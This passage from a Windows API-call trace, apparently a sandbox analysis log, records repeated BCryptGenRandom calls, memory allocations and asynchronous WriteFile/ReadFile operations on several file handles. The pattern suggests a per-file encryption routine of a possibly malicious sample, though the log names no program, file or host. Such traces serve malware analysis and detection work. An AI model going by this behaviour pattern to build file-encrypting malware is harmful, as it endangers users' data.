lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.586] CloseHandle (hObject=0x170) returned 1 [0139.586] free (_Block=0x3df0008) [0139.586] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.646] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.647] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.647] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0139.647] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.647] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.647] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0139.648] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.648] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.648] free (_Block=0x3e305b8) [0139.648] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.648] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.648] free (_Block=0x1fa91d0) [0139.649] free (_Block=0x77d7a8) [0139.649] free (_Block=0x1fa90b8) [0139.649] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.649] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.680] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3ef0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.680] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.770] CloseHandle (hObject=0x170) returned 1 [0139.770] free (_Block=0x3df0008) [0139.770] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.802] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.802] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.802] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0139.802] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.803] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.803] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0139.803] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0139.803] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0139.803] free (_Block=0x3e305b8) [0139.803] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0139.803] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0139.803] free (_Block=0x1fa91d0) [0139.803] free (_Block=0x77d7a8) [0139.803] free (_Block=0x1fa90b8) [0139.803] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.804] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.881] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x11c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0139.881] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0139.882] CloseHandle (hObject=0x170) returned 1 [0139.882] free (_Block=0x3df0008) [0139.882] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0140.413] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0140.413] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0140.413] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0140.413] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0140.414] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0140.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0140.414] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0140.414] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0140.414] free (_Block=0x3e305b8) [0140.414] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0140.414] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0140.415] free (_Block=0x1fa91d0) [0140.415] free (_Block=0x77d7a8) [0140.415] free (_Block=0x1fa90b8) [0140.415] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0140.415] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0141.137] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x26f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.407] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0141.408] CloseHandle (hObject=0x170) returned 1 [0141.408] free (_Block=0x3df0008) [0141.408] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0141.417] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.417] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0141.418] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.418] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.418] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0141.419] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.419] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.419] free (_Block=0x3e305b8) [0141.419] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.419] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.419] free (_Block=0x1fa91d0) [0141.419] free (_Block=0x77d7a8) [0141.419] free (_Block=0x1fa90b8) [0141.419] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.420] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0141.422] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4f00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.422] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0141.423] CloseHandle (hObject=0x170) returned 1 [0141.423] free (_Block=0x3df0008) [0141.423] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0141.434] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.434] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.434] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0141.434] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.435] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.435] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0141.435] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.435] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.435] free (_Block=0x3e305b8) [0141.435] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.435] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.436] free (_Block=0x1fa91d0) [0141.436] free (_Block=0x77d7a8) [0141.436] free (_Block=0x1fa90b8) [0141.436] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.436] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0141.437] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x2170, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.437] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0141.448] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1f3c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.449] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0141.450] CloseHandle (hObject=0x170) returned 1 [0141.450] free (_Block=0x3df0008) [0141.450] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0141.459] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.459] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0141.459] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.460] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0141.460] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.460] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.460] free (_Block=0x3e305b8) [0141.460] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.460] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.461] free (_Block=0x1fa91d0) [0141.461] free (_Block=0x77d7a8) [0141.461] free (_Block=0x1fa90b8) [0141.461] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.461] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0141.462] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x14a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0141.462] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0141.518] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x16ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0141.541] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0141.556] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x3734, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0141.569] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0141.580] ReadFile (in: hFile=0x308, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x3014, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0141.588] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0141.589] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x9a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0141.589] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0141.599] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.600] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0141.600] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.600] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.600] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0141.600] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.600] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.601] free (_Block=0x3e305b8) [0141.601] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.601] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.601] free (_Block=0x1fa91d0) [0141.601] free (_Block=0x77d7a8) [0141.601] free (_Block=0x1fa90b8) [0141.601] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0141.601] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0141.611] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.612] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0141.612] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.612] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.612] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0141.613] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.613] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.613] free (_Block=0x3e305b8) [0141.613] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.613] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.613] free (_Block=0x1fa91d0) [0141.613] free (_Block=0x77d7a8) [0141.613] free (_Block=0x1fa90b8) [0141.613] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0141.614] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0141.616] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.617] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.617] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0141.617] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.617] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.617] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0141.618] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.618] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.618] free (_Block=0x3e305b8) [0141.618] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.618] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.618] free (_Block=0x1fa91d0) [0141.618] free (_Block=0x77d7a8) [0141.618] free (_Block=0x1fa90b8) [0141.619] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0141.619] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0141.629] CloseHandle (hObject=0x3cc) returned 1 [0141.629] free (_Block=0x3d70450) [0141.629] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0141.636] CloseHandle (hObject=0x338) returned 1 [0141.637] free (_Block=0x3e70008) [0141.637] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0141.644] ReadFile (in: hFile=0x308, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x2c18, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0141.645] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0141.954] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0141.954] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0141.963] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.963] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.963] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0141.963] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.964] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0141.964] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0141.964] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0141.964] free (_Block=0x3e305b8) [0141.964] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0141.964] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0141.965] free (_Block=0x1fa91d0) [0141.965] free (_Block=0x77d7a8) [0141.965] free (_Block=0x1fa90b8) [0141.965] WriteFile (in: hFile=0x170, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 